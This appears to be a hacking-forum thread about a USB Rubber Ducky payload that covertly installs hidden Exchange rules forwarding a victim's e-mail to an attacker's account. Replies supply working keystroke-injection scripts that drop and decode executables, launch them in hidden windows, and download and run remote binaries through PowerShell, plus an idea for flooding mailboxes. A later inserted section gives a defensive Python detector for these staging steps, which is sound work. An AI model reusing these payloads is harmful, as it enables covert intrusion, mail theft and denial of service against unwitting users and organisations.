
[Idea] auto forward all Exchange e-mails



So I was working on some PowerShell-fu for a customer to restrict e-mails with specific keywords in the e-mail body or subject line from being delivered to a mobile device. In this effort I developed a script that creates hidden rules in Exchange that cannot be detected in the Exchange Management Shell by an admin or in Microsoft Outlook by the user. I also wrote a second tool to detect, view and delete these hidden rules.

What I would like to do is adapt this for the USB Ducky where when the duck is inserted it runs a script that injects a hidden mailbox rule that will auto forward all e-mails received by the user to a specified account.

The difficulty here is that the script requires a DLL that extends the standard MAPI32.dll that comes with Outlook or the MAPI CDO installer. I am looking for suggestions on the best way to approach getting the DLL onto the system during the duck script execution.

I am considering the Twin Duck firmware (HID + Mass Storage) option to see if I could copy the DLL to a tmp folder prior to running the script. If I were to do that, I would also like to copy the ps1 file, so I would just open PowerShell, copy the 2 files to tmp, launch the ps1 from the tmp dir, then delete the dir and walk off.

Any suggestions would be welcome.


Well, I remember there used to be a payload that would encode an exe to base64, or something like that, and then on inject would convert it back. I don't know if the process can be applied to DLLs. EXEs and DLLs tend to be relatively large in terms of ducks, and would take minutes to inject. Another problem with this method is that some of the firmware has a limit on the size of the payload. Here is some code related to the process:

'File: Base64encode.vbs
Option Explicit
' common consts
Const TypeBinary = 1
Const ForReading = 1, ForWriting = 2, ForAppending = 8


' getting file from args (no checks!)
Dim arguments, inFile, outFile


Set arguments = WScript.Arguments
inFile = arguments(0)
outFile = arguments(1)


Dim inByteArray, base64Encoded, base64Decoded, outByteArray
inByteArray = readBytes(inFile)
base64Encoded = encodeBase64(inByteArray)
Dim myFSO, WriteStuff
Set myFSO = CreateObject("Scripting.FileSystemObject")
Set WriteStuff = myFSO.OpenTextFile(outFile, ForAppending, True)
WriteStuff.WriteLine(base64Encoded)
WriteStuff.Close


private function readBytes(file)
    dim inStream
    ' ADODB stream object used
    set inStream = WScript.CreateObject("ADODB.Stream")
    ' open with no arguments makes the stream an empty container
    inStream.Open
    inStream.type= TypeBinary
    inStream.LoadFromFile(file)
    readBytes = inStream.Read()
end function


private function encodeBase64(bytes)
    dim DM, EL
    Set DM = CreateObject("Microsoft.XMLDOM")
    ' Create temporary node with Base64 data type
    Set EL = DM.createElement("tmp")
    EL.DataType = "bin.base64"
    ' Set bytes, get encoded String
    EL.NodeTypedValue = bytes
    encodeBase64 = EL.Text
end function

REM DECODE THE BASE 64 ENCODED TEXT USING A VB SCRIPT
STRING copy con c:\decoder.vbs
ENTER
STRING Option Explicit:Dim arguments, inFile, outFile:Set arguments = WScript.Arguments:inFile = arguments(0)
STRING :outFile = arguments(1):Dim base64Encoded, base64Decoded, outByteArray:dim objFS:dim objTS:set objFS =
STRING CreateObject("Scripting.FileSystemObject"):
ENTER
STRING set objTS = objFS.OpenTextFile(inFile, 1):base64Encoded =
STRING objTS.ReadAll:base64Decoded = decodeBase64(base64Encoded):writeBytes outFile, base64Decoded:private function
STRING decodeBase64(base64):
ENTER
STRING dim DM, EL:Set DM = CreateObject("Microsoft.XMLDOM"):Set EL = DM.createElement("tmp"):
STRING EL.DataType = "bin.base64":EL.Text = base64:decodeBase64 = EL.NodeTypedValue:end function:private Sub
STRING writeBytes(file, bytes):Dim binaryStream:
ENTER
STRING Set binaryStream = CreateObject("ADODB.Stream"):binaryStream.Type = 1:
STRING binaryStream.Open:binaryStream.Write bytes:binaryStream.SaveToFile file, 2:End Sub
ENTER
CTRL z
ENTER
STRING cscript decoder.vbs HelloWorldBase64.txt HelloWorld.exe
ENTER
REM RUN THE RESULTING EXECUTABLE
STRING HelloWorld.exe
ENTER

One other option is to simply take a USB drive with you, and run a script with the ducky that detects the drive's insertion and copies the DLL off the drive to a specified location. That RunEXE from SD payload usually works, and in fact works best when used in this way, because the memory on the duck tends to be a little bit slow. You could literally bring a small 2-port hub, and then plug the ducky and the drive in simultaneously in that manner.

REM Author: overwraith
REM Name: RunEXE.txt
REM Purpose: Run an executable file off of the SD card after it mounts. 
REM Encoder V2.4
REM Using the run command for a broader OS base. 
DEFAULT_DELAY 25
DELAY 3000
GUI R
DELAY 1000
STRING cmd /Q /D /T:7F /F:OFF /V:ON /K
DELAY 500
ENTER
DELAY 750
ALT SPACE
STRING M
DOWNARROW
REPEAT 100
ENTER

REM Change directories because System32 appears to be protected. 
STRING CD %TEMP%
ENTER

REM Make batch file that waits for SD card to mount. 
REM Delete batch file if already exists
STRING erase /Q DuckyWait.bat
ENTER
STRING copy con DuckyWait.bat
ENTER
REM DuckyWait.bat
STRING :while1
ENTER
STRING for /f %%d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set myd=%%d
ENTER
STRING if Exist %myd% (
ENTER
STRING goto :break
ENTER
STRING )
ENTER
STRING timeout /t 30
ENTER
STRING goto :while1
ENTER
STRING :break
ENTER
REM Continue script.
STRING START %myd%\HelloWorld.exe
ENTER
CONTROL z
ENTER

REM MAKE THE VBS FILE THAT ALLOWS RUNNING INVISIBLY.
REM Delete vbs file if already exists
STRING erase /Q invis.vbs
ENTER
REM FROM: http://stackoverflow.com/questions/289498/running-batch-file-in-background-when-windows-boots-up
STRING copy con invis.vbs
ENTER
STRING CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
ENTER
CONTROL Z
ENTER

REM RUN THE BATCH FILE
STRING wscript.exe invis.vbs DuckyWait.bat
ENTER
STRING EXIT
ENTER

Another option is to download a file from online using a bit of PowerShell. You could archive the DLL with a password, and then it would be undetectable via firewall. The only problem with this route is that you need install privileges to install the archive tool, unless there is something already on site. Here is a bit of duck code that will download and install 7-Zip:

REM *** Navigate to %TEMP%. ***
STRING cd %TEMP%
ENTER

REM *** Delete 7zip files if they already exist. ***
STRING erase /Q 7za.exe 7za920.zip 7-zip.chm license.txt readme.txt
ENTER

REM *** Install 7zip. ***
STRING powershell (new-object System.Net.WebClient).DownloadFile('http://downloads.sourceforge.net/sevenzip/7za920.zip','%TEMP%\7za920.zip'); $shell = new-object -com shell.application; $zip = $shell.NameSpace('%TEMP%\7za920.zip'); foreach($item in $zip.items()) { $shell.Namespace('%TEMP%').copyhere($item) }; Start-Process '%TEMP%\7za.exe' -ArgumentList '/S /D=%PROGRAMFILES%\7-Zip\'
DELAY 500
ENTER
REM *** Delay 7 Seconds. ***
DELAY 7000
REM *** Switch from PowerShell back to the command line. ***
STRING CMD
ENTER

Mubix wrote this:

GUI r
DELAY 100
STRING powershell (new-object System.Net.WebClient).DownloadFile('http://example.com/bob.old','%TEMP%\bob.exe'); Start-Process "%TEMP%\bob.exe"
ENTER

I have noticed that many computers don't allow PowerShell script files to be run by default. You usually have to break the code up into something that can be run from the command prompt.

And somebody explain to me how to use those show/hide boxes in posts! I cannot find the button, and these code boxes are making my post too long!

Edited by overwraith
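Defender's follow-up, added here as an example and not code from this thread or from any of its posters: every staging step in the payloads above (typing a decoder with copy con, running it with cscript, the WebClient.DownloadFile cradle, launching a batch file through a hidden-window .vbs, and polling wmic volume for a labelled drive) is an interactive command line, so it lands in process-creation telemetry. The Python below scans constructed, pipe-delimited command-line records (timestamp|host|user|image|cmdline, a made-up layout, not real 4688 output) against patterns lifted from the thread, then correlates hits per host/user so that several distinct stages inside a short window raise one alert rather than five separate ones. The sample lines, field layout, rule names, the ten-minute window and the three-rule threshold are all assumptions.

```python
"""Detect duck-style staging activity in process command-line records.

Added example, not from the thread. The log format and all sample lines
are constructed for illustration.
"""
import re
from dataclasses import dataclass
from datetime import datetime, timedelta

# Constructed sample records: timestamp|host|user|image|cmdline (made-up layout).
SAMPLE_LOGS = [
    "2024-01-01T10:00:00|host1|alice|cmd.exe|cmd /Q /D /T:7F /F:OFF /V:ON /K",
    "2024-01-01T10:00:05|host1|alice|cmd.exe|copy con decoder.vbs",
    "2024-01-01T10:00:12|host1|alice|cscript.exe|cscript decoder.vbs HelloWorldBase64.txt HelloWorld.exe",
    "2024-01-01T10:01:00|host1|alice|powershell.exe|powershell (new-object System.Net.WebClient)"
    ".DownloadFile('http://example.com/bob.old','%TEMP%\\bob.exe'); Start-Process \"%TEMP%\\bob.exe\"",
    "2024-01-01T10:02:00|host1|alice|wscript.exe|wscript.exe invis.vbs DuckyWait.bat",
    "2024-01-01T10:02:30|host1|alice|WMIC.exe|wmic volume get driveletter, label",
    "2024-01-01T11:00:00|host1|bob|notepad.exe|notepad report.txt",
]

# Each rule is one stage seen in the thread's payloads. Names are assumptions.
RULES = {
    "copy_con_script": re.compile(r"\bcopy\s+con\s+\S+\.(?:vbs|bat)\b", re.I),
    "script_host_run_vbs": re.compile(r"\b[cw]script(?:\.exe)?\s+\S+\.vbs\b", re.I),
    "webclient_download": re.compile(r"System\.Net\.WebClient\)?\.DownloadFile\(", re.I),
    "vbs_launches_batch": re.compile(r"\bwscript(?:\.exe)?\s+\S+\.vbs\s+\S+\.bat\b", re.I),
    "volume_label_probe": re.compile(r"\bwmic\s+volume\s+get\b", re.I),
}


@dataclass(frozen=True)
class Finding:
    ts: datetime
    host: str
    user: str
    rule: str
    cmdline: str


def parse_line(line: str):
    """Split one constructed record into its five fields."""
    ts, host, user, image, cmdline = line.split("|", 4)
    return datetime.fromisoformat(ts), host, user, image, cmdline


def scan(lines):
    """Return one Finding per (record, rule) pair whose command line matches."""
    findings = []
    for line in lines:
        ts, host, user, _image, cmdline = parse_line(line)
        for name, rx in RULES.items():
            if rx.search(cmdline):
                findings.append(Finding(ts, host, user, name, cmdline))
    return findings


def correlate(findings, window=timedelta(minutes=10), min_rules=3):
    """Group findings by (host, user); alert when at least `min_rules` distinct
    rules fire within `window` of some earliest hit. Returns {actor: [rules]}."""
    by_actor = {}
    for f in findings:
        by_actor.setdefault((f.host, f.user), []).append(f)
    alerts = {}
    for actor, fs in by_actor.items():
        fs.sort(key=lambda f: f.ts)
        for i, first in enumerate(fs):
            rules = {g.rule for g in fs[i:] if g.ts - first.ts <= window}
            if len(rules) >= min_rules:
                alerts[actor] = sorted(rules)
                break  # one alert per actor is enough
    return alerts


if __name__ == "__main__":
    hits = scan(SAMPLE_LOGS)
    for h in hits:
        print(f"{h.ts.isoformat()} {h.host}/{h.user} {h.rule}: {h.cmdline}")
    for (host, user), rules in correlate(hits).items():
        print(f"ALERT {host}/{user}: {len(rules)} staging stages in window: {', '.join(rules)}")
```

A single hit on any one rule is noisy (admins run wmic and wscript too); the correlation step is what turns the thread's sequence into a signal, because a user typing a decoder, running it, pulling a binary down and polling for a labelled volume within a couple of minutes is the pattern worth paging on.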

So I just figured out what base64 is. You see I had learned about it from somebody else, so I didn't fully understand the concept. Base64 and UUEncode are algorithms used in sending emails that convert binary files into a text format.


I think the idea with the 2-port hub may work best in this case; then I could install the DLL and use duck script to run the PowerShell commands line by line in interactive mode, rather than trying to use a ps1 and having the PS execution policy to deal with.

I bet this could also be adapted to eat up mailbox resources as well, by setting the recipient of the message to the user, or by setting up an auto-reply on the box that is receiving the messages to send messages with random garbage attachments.
